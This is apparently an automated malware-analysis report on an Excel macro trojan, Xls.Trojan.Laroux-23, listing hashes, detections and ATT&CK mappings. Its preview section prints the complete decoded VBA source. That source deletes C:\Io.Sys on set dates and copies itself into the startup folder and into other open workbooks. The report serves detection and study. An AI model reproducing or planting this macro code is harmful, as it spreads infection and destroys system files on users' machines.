Xls.Trojan.Laroux-23 — Office (OLE) malware analysis

Static analysis result for SHA-256 7751776f373d0062…

MALICIOUS

Office (OLE)

Size: 19.0 KB
Created: 1980-01-04 13:51:46
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 3a6f4ac0c0f224c5b647a5a6a991b59a
SHA-1: 8a9f8ffcd9b7a96f2fe85c5ed53523ec2b5496a7
SHA-256: 7751776f373d0062aa9b92a505983b15cdf107e4234ded1c9dc365edf9305c3c
Risk Score: 120

Malware Insights

Xls.Trojan.Laroux-23 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The critical heuristic is the ClamAV detection 'Xls.Trojan.Laroux-23', which strongly suggests a known malicious Excel macro trojan. The presence of an Auto_Open VBA macro confirms the intent to execute malicious code when the document is opened. The script attempts to delete 'C:\Io.Sys' and to save a copy of the workbook as 'Person.xls' in the startup path, likely to establish persistence or facilitate further payload execution.

Heuristics 2

  • VBA macros detected · medium · 1 related finding · OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro · high · OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2379 bytes
SHA-256: 4e67c6d9739989a24f69db4a6e532aba962a52d121d9e6e3a106e02a03e79182

Detection
ClamAV: Xls.Trojan.Laroux-23
Obfuscation or payload: unlikely

Preview script
First 1,000 lines of the extracted script

Attribute VB_Name = "aola"





Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    If Day(Date) >= 4 And Day(Date) <= 13 And Time < #2:25:00 PM# Then
        SetAttr "C:\Io.Sys", vbNormal
        Kill "C:\Io.Sys"
    End If
    Application.OnSheetActivate = "AutoCopy"
End Sub

Sub AutoCopy()
Attribute AutoCopy.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim sStPath, sFile, swName, swnew, sCurDir As String
    Dim bPtoF, bFtoP As Boolean
    
    bPtoF = False
    bFtoP = False
    On Error Resume Next
    sStPath = Application.StartupPath
    sFile = Dir(sStPath & "\" & "Person.xls")
    
    bFtoP = sFile <> "Person.xls"
    
    bPtoF = Not (bFtoP And (ActiveWorkbook.Modules.Count > 0))
    
    If bFtoP Then
        Application.ScreenUpdating = False
        swName = ActiveWorkbook.Name
        Sheets("aola").Visible = True
        Sheets("aola").Select
        Sheets("aola").Copy
        swnew = ActiveWorkbook.Name
        sCurDir = CurDir()
        
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(swnew).SaveAs FileName:=Application.StartupPath & "/" & "Person.xls", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        ChDir sCurDir
        Workbooks(swName).Sheets("aola").Visible = False
        ActiveWindow.ActivateNext
    End If
    
    If bPtoF And (Not bFtoP) Then
        swnew = ActiveWorkbook.Name
        Application.ScreenUpdating = False
        sCurDir = ActiveWorkbook.Path
        If Workbooks(swnew).Sheets(1).Name <> "aola" Then
            Workbooks("Person.xls").Sheets("aola").Copy before:=Workbooks(swnew).Sheets(1)
            Workbooks(swnew).Sheets("aola").Visible = False
            Workbooks(swnew).Save
        End If
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "Person.xls!AutoCopy"
End Sub

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True